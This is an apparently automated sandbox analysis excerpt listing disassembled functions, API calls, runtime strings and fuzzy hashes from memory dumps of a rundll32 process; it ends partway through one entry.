                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$ContextInitializeSecurity
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 1120248335-2333694755
                              • Opcode ID: a32c849bd00eaf273d48e3694b9c6634d8be0db742db25f12a121f2eaae223d4
                              • Instruction ID: 351aa1900cd369e7b6ccef0a1fd643f3a65853a875056f60bcec798e8fd266b8
                              • Opcode Fuzzy Hash: a32c849bd00eaf273d48e3694b9c6634d8be0db742db25f12a121f2eaae223d4
                              • Instruction Fuzzy Hash: F19168B16083019FD304CF19C880B6AFBE5EF85319F14C92DE5998B791EB31E849CB92
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,000000FF,00000001,FFFFFFFF), ref: 6CC4A870
                              • GetLastError.KERNEL32 ref: 6CC4A87B
                              Strings
                              • NulErrorUtf8Errorvalid_up_toerror_len, xrefs: 6CC4A8EE
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4A8A8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID: NulErrorUtf8Errorvalid_up_toerror_len$use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 1574541344-1776713852
                              • Opcode ID: e76dbb0c6ac20f9dca73e8d905182a557b9170bf347ef8df9b03b56976625270
                              • Instruction ID: ebbd7a534070af7bbc950522c936c08a11113a5223ee2f3d428c962414d54eda
                              • Opcode Fuzzy Hash: e76dbb0c6ac20f9dca73e8d905182a557b9170bf347ef8df9b03b56976625270
                              • Instruction Fuzzy Hash: 3861E671E002088FDB15CFA9C885BEEBBB5EF88314F14857AD404A7B81E7359945CB94
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,000000FF,00000001,FFFFFFFF), ref: 6CC4A870
                              • GetLastError.KERNEL32 ref: 6CC4A87B
                              Strings
                              • NulErrorUtf8Errorvalid_up_toerror_len, xrefs: 6CC4A8EE
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4A8A8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID: NulErrorUtf8Errorvalid_up_toerror_len$use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 1574541344-1776713852
                              • Opcode ID: c2e970b86cadf7cd796554d1b04e6c8d1b60524854c3ee2eff3679312e4786ec
                              • Instruction ID: 174f3cee29db198a5d4e2ed6bc7b90c50ff34faa0aab502607c66306cd0dd777
                              • Opcode Fuzzy Hash: c2e970b86cadf7cd796554d1b04e6c8d1b60524854c3ee2eff3679312e4786ec
                              • Instruction Fuzzy Hash: 7051C431A002448FDB15CF69C885BEEBBB5EB89314F14C17AD805A7B81E7359946CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: $2$l
                              • API String ID: 0-3132104027
                              • Opcode ID: 8733acf2d44eca8639c91740be39d12bd9a02127ba3db65e983c88efae1b4097
                              • Instruction ID: 93f26f402bdaeea3a16f9fc6d45cb1e99d581031c08dc454b8b3a00186d6dceb
                              • Opcode Fuzzy Hash: 8733acf2d44eca8639c91740be39d12bd9a02127ba3db65e983c88efae1b4097
                              • Instruction Fuzzy Hash: B041C731A042699BDF348E1488DC3E877B2FB15355F3805DAC09A5A2A1FB756AC6CF41
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: $2$l
                              • API String ID: 0-3132104027
                              • Opcode ID: 8d09b43a9b92cbbcdd060b45c0838ecab406f7740e78c5c2131da58acf1fc95f
                              • Instruction ID: ab697be2e36eb145860d716d08e69e3310aa800382dfbf39821659209ab3142e
                              • Opcode Fuzzy Hash: 8d09b43a9b92cbbcdd060b45c0838ecab406f7740e78c5c2131da58acf1fc95f
                              • Instruction Fuzzy Hash: A541D67184426D8ADF348F149CE83E9B7B1BB12325F0801DBC19966262F374AAC7CF54
                              APIs
                              Strings
                              • assertion failed: (*tail).value.is_none(), xrefs: 6CBEBE90
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CBEBEC5
                              • assertion failed: (*next).value.is_some(), xrefs: 6CBEBEA2
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: SwitchThread
                              • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()$called `Result::unwrap()` on an `Err` value
                              • API String ID: 115865932-1206542395
                              • Opcode ID: ebd06c587ae2fc60e518fa75a4afc96131391f9bf27acd7252c2f3374490e464
                              • Instruction ID: 06a3192ab02b46195b3b0b17c459404b2dd0e10ade604e399eae39c008e96f6a
                              • Opcode Fuzzy Hash: ebd06c587ae2fc60e518fa75a4afc96131391f9bf27acd7252c2f3374490e464
                              • Instruction Fuzzy Hash: FF312630601B868FD700CF25C85076EB7E1EF8A799F108D1DE9989BB51EB70D846C792
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC0F9AA
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC0F9F0
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0FA20
                                • Part of subcall function 6CC23A0F: memmove.VCRUNTIME140(00000000,?,000000B8,?,?,6CC0FA35), ref: 6CC23A29
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0FA5E
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0FAA7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 020269b430839bec9eae6d930f01f1575182ff2e5d540952c44a665f96251941
                              • Instruction ID: 57f1ffda750704548d462fa690afe8896672825e778ec2af8694b806efe185c5
                              • Opcode Fuzzy Hash: 020269b430839bec9eae6d930f01f1575182ff2e5d540952c44a665f96251941
                              • Instruction Fuzzy Hash: 0AA16F716087419FCB11CF24C4907DAB7E1AF8A314F08856AEC895F746EB709989CB66
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC38176
                              • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CC381BC
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC381EC
                                • Part of subcall function 6CC23A0F: memmove.VCRUNTIME140(00000000,?,000000B8,?,?,6CC0FA35), ref: 6CC23A29
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC3822A
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC38273
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 548f74d799b366aea70baf008907f3bb68b7de111d79c96dd234008f93a7f770
                              • Instruction ID: 00854f4692848c01fc22d9368cf9f70b07fa709b626d0be9cd318be5c9acbf25
                              • Opcode Fuzzy Hash: 548f74d799b366aea70baf008907f3bb68b7de111d79c96dd234008f93a7f770
                              • Instruction Fuzzy Hash: 2FA182755087409FCB11CF24D480BDAB7E1AF89714F08896EDC8D9F746EB709949CBA2
                              APIs
                              • memmove.VCRUNTIME140(?,00000098,00000098), ref: 6CC181A2
                              • memmove.VCRUNTIME140(00000000,?,00000738), ref: 6CC181F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: scheme is valid$slash is a valid path
                              • API String ID: 2162964266-3029000764
                              • Opcode ID: 2731b9379dd578ccf8f3a9d96b84a2b3e5cd27c0ee9eb9075a5db6601876aa25
                              • Instruction ID: 7a53f257ce467f1945fb5504844b0b6e5223eb8642e72c662a31e32f07bc74b4
                              • Opcode Fuzzy Hash: 2731b9379dd578ccf8f3a9d96b84a2b3e5cd27c0ee9eb9075a5db6601876aa25
                              • Instruction Fuzzy Hash: 62B11531A08B818BD711CF25C4407AEB7E1BFC6358F148A1DE4885FB81EB75D94ADB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CBF0491
                              • memmove.VCRUNTIME140(00000000,?,?), ref: 6CBF0570
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: capacity overflow
                              • API String ID: 2162964266-2273299319
                              • Opcode ID: 0dd87794775d159244e03a37c4f2686444cf7590ba190ba0669507e457a3e4a9
                              • Instruction ID: 0cc92f343a1ee390efb9f10c7c3daaf0939b06b6a81fb403ae0a3825757dfd6c
                              • Opcode Fuzzy Hash: 0dd87794775d159244e03a37c4f2686444cf7590ba190ba0669507e457a3e4a9
                              • Instruction Fuzzy Hash: F071E370A046869BC304DF19D59066EF3E5FF84714F10862DD8A947B60EB75EC9ACB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CBF0655
                              • memmove.VCRUNTIME140(00000000,?,?), ref: 6CBF074B
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
                              • API String ID: 2162964266-2618782069
                              • Opcode ID: 13631eae44d6808372859e193b7e79021813851b705e000d9bcf3a0162934d9d
                              • Instruction ID: 3dbef83c43dc26e65a8eddbbd6ff08d663c44570a16dbee0ba735653d073ca60
                              • Opcode Fuzzy Hash: 13631eae44d6808372859e193b7e79021813851b705e000d9bcf3a0162934d9d
                              • Instruction Fuzzy Hash: 7C51A070608785ABC704DF59D590A5EB7E6FFC5304F10892DE4694BB61EB70E88ECB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __calloc_crt__init_pointers__mtterm
                              • String ID:
                              • API String ID: 2478854527-0
                              • Opcode ID: ee1b5a3cfca8483b6adddd909e68841009dfdd7312d5b4ad701d057e656e09f0
                              • Instruction ID: c47868c48e02d05927d34beed8ce004c809d9e9aa81bbf98f7ed7a5303036b40
                              • Opcode Fuzzy Hash: ee1b5a3cfca8483b6adddd909e68841009dfdd7312d5b4ad701d057e656e09f0
                              • Instruction Fuzzy Hash: A2311B31A02630AEFB12EF759C98A567FA4EB59760B20461AF910D63B1EB319081EF50
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC59A2C
                              • CloseHandle.KERNEL32(?), ref: 6CC59A3A
                              • GetLastError.KERNEL32 ref: 6CC59AA5
                              • CloseHandle.KERNEL32(?), ref: 6CC59B06
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandle$ErrorLastObjectSingleWait
                              • String ID:
                              • API String ID: 1454876536-0
                              • Opcode ID: 0a740527abf837646f05e9bec8d7744087c24684a375b418cb95b2015fe8bd40
                              • Instruction ID: 331760ec38cae3fec3fa0e8779db4d07ee4a0ff5be83f86a5208192cd74d83c9
                              • Opcode Fuzzy Hash: 0a740527abf837646f05e9bec8d7744087c24684a375b418cb95b2015fe8bd40
                              • Instruction Fuzzy Hash: AB31F0B1A007048FCB04DF65C984B9ABBB4FF48328F14C56DD40AABB50E735D856CBA0
                              APIs
                              • __RTC_Initialize.LIBCMT ref: 6CC6104B
                                • Part of subcall function 6CC613C6: InitializeSListHead.KERNEL32(6CCC2168,6CC61055,6CCC09F0,00000010,6CC60FE6,?,?,?,6CC6120C,?,00000001,?,?,00000001,?,6CCC0A38), ref: 6CC613CB
                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CC6621C,6CC66220,6CCC09F0,00000010,6CC60FE6,?,?,?,6CC6120C,?,00000001,?,?,00000001,?,6CCC0A38), ref: 6CC61064
                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CC66214,6CC66218,6CCC09F0,00000010,6CC60FE6,?,?,?,6CC6120C,?,00000001,?,?,00000001,?,6CCC0A38), ref: 6CC61082
                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CC610B5
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                              • String ID:
                              • API String ID: 590286634-0
                              • Opcode ID: 95910293f6cf43acfd3add81e6c39d5b89c68359fba24241cde662c66b94a640
                              • Instruction ID: 830774e07cfe581141ef0cc8590ccb5796df7da44965c0eed159cec14fa4da60
                              • Opcode Fuzzy Hash: 95910293f6cf43acfd3add81e6c39d5b89c68359fba24241cde662c66b94a640
                              • Instruction Fuzzy Hash: BA21CF316496459EDF109BBF97947EC33B19B0622FF144415C581A7F80FB32C10AA665
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                              • Instruction ID: dc140576cb17360e66db5d7976076ad5159ff0861c4feeab05928b62e36507d9
                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                              • Instruction Fuzzy Hash: AE114B7240014EBBCF125F84DC51CEE3F62BB18B58F588419FA6899130E636E5B2AF85
                              APIs
                              • _malloc.LIBCMT ref: 0466F040
                                • Part of subcall function 0466EF92: __FF_MSGBANNER.LIBCMT ref: 0466EFAB
                                • Part of subcall function 0466EF92: __NMSG_WRITE.LIBCMT ref: 0466EFB2
                              • std::exception::exception.LIBCMT ref: 0466F075
                              • std::exception::exception.LIBCMT ref: 0466F08F
                              • __CxxThrowException@8.LIBCMT ref: 0466F0A0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: std::exception::exception$Exception@8Throw_malloc
                              • String ID:
                              • API String ID: 2388904642-0
                              • Opcode ID: d3a09533d38bf96fbcdeea7404bc42bbfdad1700ad1bdc5c3aa64567319aa372
                              • Instruction ID: 49119efe2257f46cc66a10c5f58082a93faadc3ab8c1aa950380b1f317841413
                              • Opcode Fuzzy Hash: d3a09533d38bf96fbcdeea7404bc42bbfdad1700ad1bdc5c3aa64567319aa372
                              • Instruction Fuzzy Hash: 4EF02875400219BBEB19EF54FC24ABE7BA9EB50748F90402DD50292190FB72FE02CB94
                              APIs
                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CC4EFFE
                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6CCC2124), ref: 6CC4F203
                              Strings
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4F2EC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressSingleWake
                              • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 3114109732-459553403
                              • Opcode ID: 6607e3423ae351b1388e58a8b4e0538524369dc381299b545968e97be3b63a11
                              • Instruction ID: 927f61083bb13b3dcaed81207d7d2b3507cedaaca7bcf864042ad70707340d17
                              • Opcode Fuzzy Hash: 6607e3423ae351b1388e58a8b4e0538524369dc381299b545968e97be3b63a11
                              • Instruction Fuzzy Hash: F7D1E174A00248CFDB11CFA5C494BDEBBB1FF4A308F14C16AD916ABB91E7359946CB90
                              APIs
                              • _malloc.LIBCMT ref: 046698DF
                                • Part of subcall function 0466EF92: __FF_MSGBANNER.LIBCMT ref: 0466EFAB
                                • Part of subcall function 0466EF92: __NMSG_WRITE.LIBCMT ref: 0466EFB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _malloc
                              • String ID: &
                              • API String ID: 1579825452-3042966939
                              • Opcode ID: b598dab0db35afd4cecf5f088763f976702afa5d49a8f07c45262a70ab33495b
                              • Instruction ID: faa14f0ba0e423febb9811dff7d37899f27110a0c572b2c9013a040f74921b31
                              • Opcode Fuzzy Hash: b598dab0db35afd4cecf5f088763f976702afa5d49a8f07c45262a70ab33495b
                              • Instruction Fuzzy Hash: A1C123F1A002199FDB24CF55CCC4BAAB7B4EB58304F1485ADDA0A97241E774BE89CF54
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _memset_wcsrchr
                              • String ID: D
                              • API String ID: 1675014779-2746444292
                              • Opcode ID: 9acbe9d8cb78e65742daa30000f13f8c3748e978fcf48c481d77b0f92a49766f
                              • Instruction ID: 2d004c573bdfef37b30b6804c282f84496a10a57517cca3a2878a3a41eb171a5
                              • Opcode Fuzzy Hash: 9acbe9d8cb78e65742daa30000f13f8c3748e978fcf48c481d77b0f92a49766f
                              • Instruction Fuzzy Hash: AD31E7729402187BE724ABE49C89FEF7768EB54710F100229FB0AEA1C0EA717945C7A5
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000000,000000FF,00000001,000000FF), ref: 6CC4A645
                              • GetLastError.KERNEL32 ref: 6CC4A64C
                              Strings
                              • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CC4A65A
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                              • API String ID: 1574541344-459553403
                              • Opcode ID: f994aa86faaa7705c2c73c79c99d16be3deed8ad24de3e8720454b3b9d4f6d0e
                              • Instruction ID: 8a39c91f72af55aa74f81cb00712bec1462cf788adbbf519f5fbbf30b2485480
                              • Opcode Fuzzy Hash: f994aa86faaa7705c2c73c79c99d16be3deed8ad24de3e8720454b3b9d4f6d0e
                              • Instruction Fuzzy Hash: 7341F034A00584CFD711CF58C594BAAB7B0EB86318F10C1BAD815ABB81E736A906CF90
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CC61C55
                              • ___raise_securityfailure.LIBCMT ref: 6CC61D3D
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FeaturePresentProcessor___raise_securityfailure
                              • String ID: ^j+
                              • API String ID: 3761405300-2127788193
                              • Opcode ID: b96265487bf190aa0181e67f3da6b911cc64d24529c8a44606d0acb213a62040
                              • Instruction ID: 4dfac9581c7b23cb796d55b5a7de5d6e0a0500fe912a4537a9e6610132732fc1
                              • Opcode Fuzzy Hash: b96265487bf190aa0181e67f3da6b911cc64d24529c8a44606d0acb213a62040
                              • Instruction Fuzzy Hash: A621D5B8B15301EEEB04CF1AD5A97457BB4FB0A324F10612AE509DA7A0E7B09A81CF55
                              APIs
                              • __getptd.LIBCMT ref: 0468009D
                                • Part of subcall function 04673800: __getptd_noexit.LIBCMT ref: 04673803
                                • Part of subcall function 04673800: __amsg_exit.LIBCMT ref: 04673810
                              • __getptd.LIBCMT ref: 046800AB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd$__amsg_exit__getptd_noexit
                              • String ID: csm
                              • API String ID: 803148776-1018135373
                              • Opcode ID: 5ee49735deb65bfb04637f9989aa34e627c47001ba93af2d51fe64eeff1f3342
                              • Instruction ID: d0a39c0c1d8acee410a3510c437e985c973c76557e766d727d051e395975750d
